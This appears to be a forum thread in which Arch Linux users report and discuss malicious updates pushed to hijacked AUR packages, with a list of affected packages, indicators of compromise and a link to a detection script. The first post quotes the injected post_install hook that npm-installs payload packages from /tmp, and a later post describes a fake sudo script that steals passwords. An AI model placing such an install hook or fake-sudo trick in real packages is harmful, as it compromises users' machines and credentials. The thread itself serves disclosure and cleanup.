You are not logged in.
i just received multiple emails regarding packages i used to contribute to, with malicous updates, they all have this new .install file(or similar):
+post_install() {{
+ cd /tmp
+ npm install atomic-lockfile axios cosmiconfig uuid
+}}packages: perl-alien-wxwidgets, premake-git, smenu, git-annex-standalone, panwriter, smenu, fatx, vbam-git, ipfs-desktop-bin
this is active and ongoing, they've been taken over by new accounts with random names and random emails.
Last edited by darthvader (Today 16:10:00)
Offline
Yes, there has been quite a flood in the last hour or so. See the recent aur-general posts.
Offline
The Moderation team is aware and a few of the moderators are already cleaning things up!
Offline
Noticed it as well. Indicators of compromise can be:
- a new systemd user service with a random name pointing to the hidden malicious binary
- a shell script at ~/.local/bin/sudo for stealing passwords
- tor network traffic
Offline
i have same with python-openai-harmony package
// Truth is distributed, not fixed.
Offline
Offline
We have a filter script to find those, see the example here: https://github.com/archlinux/contrib/pull/108
Offline